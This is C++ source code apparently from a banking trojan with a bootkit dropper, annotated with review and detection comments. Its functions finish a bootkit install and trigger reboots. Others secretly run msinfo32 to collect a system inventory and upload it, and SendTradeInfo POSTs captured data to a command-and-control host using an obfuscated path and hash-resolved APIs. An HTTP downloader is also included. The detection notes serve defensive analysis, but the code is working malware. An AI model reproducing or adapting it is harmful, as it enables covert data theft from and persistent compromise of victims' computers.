		PP_DPRINTF(L"ExplorerMain: BkFile not exists. Runing ExplorerStart()");
		if ( ExplorerStart(NULL) )
		{
			ret = TRUE;
			BkInstalledSuccess = true;
			
			PP_DPRINTF(L"ExplorerMain: ExplorerStart()  finished successfuly. Saving 0x00000001 in '%S'",
				PathBkFile);

			// Write 4 bytes with a one into BkFile.
			File::WriteBufferA(PathBkFile,&ret,sizeof(BOOL));
		}
	}
	else
	{
		PP_DPRINTF(L"ExplorerMain: BkFile exists.");
		ret = TRUE;
	};

	if ( ret )
	{
		// If the check finds the Bk file, or the install returns success, a
		// file is created in the system root holding the 4 bytes of a string
		// address. This file is checked by the ring3 bot that launched the
		// bootkit dropper. When it finds this file it will try to remove
		// itself from autorun.

		PCHAR Path= STR::Alloc(MAX_PATH);
		PCHAR UID=STR::Alloc(120);

		pGetSystemDirectoryA(Path,MAX_PATH);
		GenerateUid(UID);
		// Keep only "X:\" of the system directory.
		Path[3]='\0';
		
		PCHAR Pref= STR::GetRightStr(UID,"0");
		m_lstrcat(Path, Pref);

		PP_DPRINTF(L"ExplorerMain: Bk installed. Creating file '%S'", Path);
		// &Path: the file content is the pointer value itself, as the comment
		// above describes, not the path string.
		File::WriteBufferA(Path,&Path,sizeof(PCHAR));

		STR::Free(Pref);
		STR::Free(UID);
		STR::Free(Path);
	};

	if (BkInstalledSuccess)
	{
		DWORD thid = 0;
		PP_DPRINTF(L"ExplorerMain: starting reboot thread and reboot notify thread");
		// Thread handles are not closed or joined.
		pCreateThread(NULL, 0, RebootThread, NULL, 0, &thid);
		pCreateThread(NULL, 0, RebootNotifyThread, NULL, 0, &thid);
	}

	PP_DPRINTF(L"ExplorerMain: finished.");

	return ret;
}
//
// Collects a system inventory by running msinfo32.exe /report "<temp file>"
// (intended to be hidden), packs the report into a cab as "sysinfo.txt" and
// sends it to settings->StatUrl with DebugReportSendSysInfo. Does nothing when
// settings->Enabled is false. The temp report and cab are deleted afterwards;
// MsInfoPath, ReportPath and CabPath are freed, MsInfoParam is not.
//
// Detection note: msinfo32.exe launched with a /report argument pointing at a
// temp file, followed by an HTTP upload of a cab containing "sysinfo.txt".
//
void DebugReportCreateConfigReportAndSend()
{
	PCHAR MsInfoPath = NULL;
	PCHAR MsInfoParam = NULL;
	PCHAR ReportPath = NULL;
	PCHAR CabPath = NULL;

	DebugReportSettings* settings = DebugReportGetSettings();
	DBGRPTDBG("DebugReportCreateConfigReportAndSend",
		"Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'",
		settings->Enabled, settings->StatPrefix, settings->StatUrl
		);

	// Early return skips DebugReportFreeSettings(settings) below.
	if (!settings->Enabled) return;

	// do { ... } while (false): every `break` jumps to the common cleanup.
	do
	{
		// Get the path to msinfo32.exe
		MsInfoPath = GetPathToMsInfo32();
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath);
		if (MsInfoPath == NULL) break;

		// Temporary file for the report
		ReportPath = File::GetTempNameA();
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath);
		if (ReportPath == NULL) break;

		MsInfoParam = STR::Alloc(2 * MAX_PATH);
		if (MsInfoParam == NULL) break;

		PROCESS_INFORMATION pi;
		STARTUPINFOA si;

		m_memset(&si, 0, sizeof(si));
		m_memset(&pi, 0, sizeof(pi));
		// NOTE(review): same pattern as GetPathToMsInfo32 — clear length is
		// taken from the just-allocated buffer; confirm STR::Alloc semantics.
		m_memset(MsInfoParam, 0, STR::Length(MsInfoParam));

		// Launch hidden
		si.cb = sizeof(si);
		si.wShowWindow = SW_HIDE;
		
		// Command line is " /report "<ReportPath>"" with no argv[0]; the
		// executable comes from lpApplicationName below.
		m_lstrcat(MsInfoParam, " /report \"");
		m_lstrcat(MsInfoParam, ReportPath);
		m_lstrcat(MsInfoParam, "\"");
		
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')",
			MsInfoPath, MsInfoParam);

		BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)",
			process_result, pi.hProcess, pi.dwProcessId);

		if (process_result == FALSE) break;
		if (pi.hProcess == NULL) break;

		// Always true here — the NULL case broke out just above.
		if (pi.hProcess != NULL)
		{
			DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32.");
			pWaitForSingleObject(pi.hProcess, INFINITE);
			pCloseHandle(pi.hProcess);
		}

		if (pi.hThread != NULL) pCloseHandle(pi.hThread);

		DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath);
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.",
			ReportPath, attributes);
		if (attributes == INVALID_FILE_ATTRIBUTES) break;

		// CabPath is not NULL-checked before CreateCab.
		CabPath = File::GetTempNameA();
		HCAB CabHandle = CreateCab(CabPath);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.",
			CabHandle);

		if (CabHandle == NULL) break;

		AddFileToCab(CabHandle, ReportPath, "sysinfo.txt");
		CloseCab(CabHandle);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report.");

		// Report identifier derived from the configured StatPrefix.
		string BotUid = GenerateUidAsString(settings->StatPrefix);
		DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent.");
	}
	while (false);

	// Cleanup: temp artifacts are removed from disk after the upload.
	if (ReportPath != NULL) pDeleteFileA(ReportPath);
	if (CabPath != NULL)    pDeleteFileA(CabPath);

	if (ReportPath != NULL) STR::Free(ReportPath);
	if (CabPath != NULL)    STR::Free(CabPath);
	if (MsInfoPath != NULL) STR::Free(MsInfoPath);

	DebugReportFreeSettings(settings);

	DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished.");
}
//
// Sends Buffer to the active host as "id=<uid>&data=<URL-encoded Buffer>" in
// an HTTP/1.1 POST to /get/tra.html on port 80 (the path is assembled from
// single characters below). Returns MySend's result; returns false (written
// as 0) when no active host is known, and false when an allocation fails.
//
// Detection note: fixed request shape — POST /get/tra.html, "Accept: text/html",
// "Connection: Close", form-urlencoded body starting with "id=".
//
bool SendTradeInfo( char *Buffer )
{
	string Serv = GetActiveHost();
	
	if ( Serv.IsEmpty())
		return 0;



	// Fixed 30-byte host buffer; Serv is copied without a length check.
	char Host[30];
	m_lstrcpy( Host, Serv.t_str());


	// "/get/tra.html" built character by character.
	char Script[]  = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0};
	char Args[]	   = "id=%s&data=%s";

	char Request[] = "POST %s HTTP/1.1\r\n"
					 "Host: %s\r\n"
					 "User-Agent: %s\r\n"
					 "Accept: text/html\r\n"
					 "Connection: Close\r\n"
					 "Content-Type: application/x-www-form-urlencoded\r\n"
					 "Content-Length: %d\r\n\r\n";

	char Uid[100];
	GenerateUid( Uid );

	// Data (the URLEncode result) is never released on any path.
	char *Data	   = URLEncode( Buffer );
	char *PartReq  = (char*)MemAlloc( 1024 );

	// wsprintfA resolved by hash through GetProcAddressEx (same as ReportToPlugin).
	typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
	fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );

	if ( PartReq == NULL )
	{
		return false;
	}
	
	// 1024-byte body buffer; Data length is not checked against it.
	_pwsprintfA( PartReq, Args, Uid, Data );

	
	char *Header = (char*)MemAlloc( 1024 );

	if ( Header == NULL )
	{
		MemFree( PartReq );
		return false;
	}


	char *UserAgent = (char*)MemAlloc( 1024 );
	DWORD dwUserSize = 1024;

	// Neither the allocation nor the call result is checked.
	pObtainUserAgentString( 0, UserAgent, &dwUserSize );

	_pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) );

	MemFree( UserAgent );
	
	// +1 terminator, +2 for the trailing CRLF appended below.
	char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 );

	if ( SendBuffer == NULL )
	{
		MemFree( PartReq );
		MemFree( Header );
		return false;
	}

	m_lstrcpy( SendBuffer, Header );
	m_lstrcat( SendBuffer, PartReq );
	m_lstrcat( SendBuffer, "\r\n" );

	MemFree( Header  );
	MemFree( PartReq );

	// The socket is not checked for -1 before use (contrast with ReportToPlugin).
	SOCKET Socket = MyConnect( Host, 80 );

	bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) );

	pclosesocket( Socket );

	MemFree( SendBuffer );

	return  Ret;
}
//
// Fetches Url with a plain HTTP/1.1 GET and hands the response body to the
// caller: *lpBuffer receives the buffer returned by RecvAndParse, *dwSize its
// length. Returns false on WSAStartup / ParseUrl / connect / send / receive
// failure, and also when dwSize is NULL (the received buffer is then leaked).
// Nothing asynchronous is visible in this function despite its name.
//
// Detection note: fixed header set — "Accept: */* ", "Accept-Language: ru ",
// "UA-CPU: x86 ", "Accept-Encoding: gzip, deflate " (each with a space before
// CRLF), "Connection: Close", and an extra trailing CRLF.
//
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
	WSADATA wsa;

	// WSAStartup on every call, never matched by WSACleanup here.
	if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
	{
		return false;
	}

	char *Host = NULL;
	char *Path = NULL;
	int   Port = 80;

	if ( !ParseUrl( Url, &Host, &Path, &Port ) )
	{
		return false;
	}

	SOCKET Socket = MyConnect( Host, Port );

	// Host and Path are not released on this path.
	if( Socket == -1 )
	{
		return false;
	}

	char *UserAgent = NULL;
	UserAgent = (char*)MemAlloc( 1024 );
	DWORD dwUserSize = 1024;

	// Neither the allocation nor the call result is checked.
	pObtainUserAgentString( 0, UserAgent, &dwUserSize );

	// Fixed 2048-byte request; Path, UserAgent and Host lengths are not
	// checked against it.
	char *query=(char*)MemAlloc(2048);

	// "GET /" + Path — whether Path already carries a leading "/" depends on
	// ParseUrl (not on this page).
	m_lstrcpy(query,"GET /");
	m_lstrcat(query,Path);
	m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
	m_lstrcat(query,"Accept-Language: ru \r\n");
	m_lstrcat(query,"UA-CPU: x86 \r\n");
	m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
	m_lstrcat(query,"User-Agent: ");
	m_lstrcat(query,UserAgent);
	m_lstrcat(query,"\r\nHost: ");
	m_lstrcat(query,Host);
	m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");



	bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );


	// Path is deliberately left unreleased (see commented line); its
	// ownership is not clear from this page.
	MemFree( Host );
	//MemFree( Path );
	MemFree( UserAgent );
	MemFree( query );
	// Socket is left open on a send failure.
	if ( !b )
	{
		return false;
	}

	DWORD dwSizeFile = 0;

	char *Buffer = RecvAndParse( Socket, &dwSizeFile );

	// The socket is closed only on this failure path; on success it is
	// neither closed here nor handed to the caller.
	if ( !Buffer )
	{
		pclosesocket( Socket );
		return false;
	}

	if ( dwSize )
	{
		*lpBuffer  = (LPBYTE)Buffer;
		*dwSize    = dwSizeFile;

		return true;
	}

	// dwSize == NULL: Buffer is leaked and the socket stays open.
	return false;
}